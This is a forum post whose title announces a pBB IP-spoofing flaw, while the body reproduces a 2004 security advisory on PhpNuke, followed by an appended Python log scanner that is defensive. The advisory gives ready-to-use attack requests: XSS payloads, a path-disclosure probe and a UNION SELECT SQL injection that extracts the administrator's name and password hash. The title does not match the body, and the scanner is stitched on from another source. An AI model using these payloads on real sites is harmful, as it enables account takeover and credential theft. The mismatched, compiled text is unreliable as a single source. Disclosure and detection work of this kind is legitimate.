Posted 13-06-2007, 12.19.04 by Ikarosavenger_79 (Member; registered 28-05-2007; 32 posts)
pBB 2.0.8a and lower - IP spoofing vulnerability

{================================================================================}
{ [waraxe-2004-SA#027] }
{================================================================================}
{ }
{ [ Once again - critical vulnerabilities in PhpNuke 6.x - 7.2 ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 05. May 2004
Location: Estonia, Tartu
Web: //waraxe.us/index.php?modname=sa&id=27


Affected software description
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management system, written in php by
Francisco Burzi. This CMS (Content Management System) is used on many thousands of
websites, because it's freeware, easy to install and has a broad set of features.

Homepage: //phpnuke.org


Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure

A1 - the unsanitized user-submitted variable "show" can trigger standard php error messages,
revealing the full path to the script - information needed by a potential hacker.

Example: make a request like this

//localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar

and an error message appears:

Warning: Division by zero in D\apache_oot\nuke72\modules\Downloads\index.php on line 797


B. Cross-site scripting aka XSS

XSS can be used for cookie stealing, and because in PhpNuke authentication-related information
is stored in cookies, account hijacking and ID spoofing can happen.

B1 - XSS through the unsanitized user-submitted variable "ttitle"

//localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=[xss code here]
//localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337>

B2 - XSS through the unsanitized user-submitted variable "sid"

//localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=[xss code here]


C. Sql injection

C1 - noncritical sql injection through the unsanitized user-submitted variable "orderby"

//localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&orderby=foobar

C3 - critical sql injection through the unsanitized user-submitted variable "sid"

Let's look at the original code from "nuke72/modules/Downloads/index.php", line 901:

    $result=$db->sql_query("
    SELECT lid, url, title, description, date, hits, downloadratingsummary, totalvotes,
    totaments, filesize, version, homepage
    FROM ".$prefix."_downloads_downloads
    WHERE sid=$sid
    order by $orderby
    limit $min,$perpage
    ");

Oops, the "$sid" variable is unquoted in the sql query. Scary...
What if we request something like

//localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

Cool - the admin's username and the password's md5 hash in plaintext

Have a nice day!


Greetings
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to all bugtraq readers in Estonia! Tervitused!
Special greets to //gamecheaters.us staff!
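As an added, defender-side example that is not part of the advisory or of this forum post: a small Python scanner that runs the request shapes the advisory describes (the /**/-padded UNION SELECT in "sid", the script tag in "ttitle", the non-numeric "show" value) against Apache-style access-log lines. The log lines are constructed, and the set of integer-only parameters and the heuristic patterns are assumptions, not PhpNuke's own validation.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (hypothetical, not taken from the advisory);
# the query strings mirror the request shapes the advisory describes.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jun/2007:12:19:04 +0100] "GET /nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* HTTP/1.1" 200 5120
10.0.0.6 - - [13/Jun/2007:12:20:10 +0100] "GET /nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=42 HTTP/1.1" 200 4090
10.0.0.7 - - [13/Jun/2007:12:21:33 +0100] "GET /nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=%3Cbody%20onload%3Ddocument.title%3D1337%3E HTTP/1.1" 200 3001
10.0.0.8 - - [13/Jun/2007:12:22:01 +0100] "GET /nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar HTTP/1.1" 200 4100
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')
# Assumption: these Downloads-module parameters are only ever integers.
NUMERIC_PARAMS = {"sid", "cid", "lid", "show", "min"}
SQL_RE = re.compile(r"\b(union\s+select|select\b.*\bfrom\b|or\s+\d+=\d+)")
XSS_RE = re.compile(r"<\s*\w+|on\w+\s*=|javascript:")

def normalize(value: str) -> str:
    """URL-decode (twice, to catch double-encoding), replace /*...*/ comments with a
    space (the advisory's whitespace substitute), collapse whitespace, lowercase."""
    decoded = unquote_plus(unquote_plus(value))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).strip().lower()

def inspect_request(path: str) -> list:
    """Return (param, finding) tuples for one Downloads-module request; [] if clean."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if qs.get("name") != ["Downloads"]:
        return []
    findings = []
    for param, values in qs.items():
        for value in values:
            norm = normalize(value)
            if SQL_RE.search(norm):
                findings.append((param, "sql-injection"))
            elif param in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", norm):
                findings.append((param, "non-numeric-id"))   # e.g. show=foobar probe
            elif XSS_RE.search(norm):
                findings.append((param, "xss"))
    return findings

def scan_log(text: str) -> list:
    """Return (client_ip, param, finding) for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            for param, finding in inspect_request(m.group(2)):
                hits.append((m.group(1), param, finding))
    return hits
```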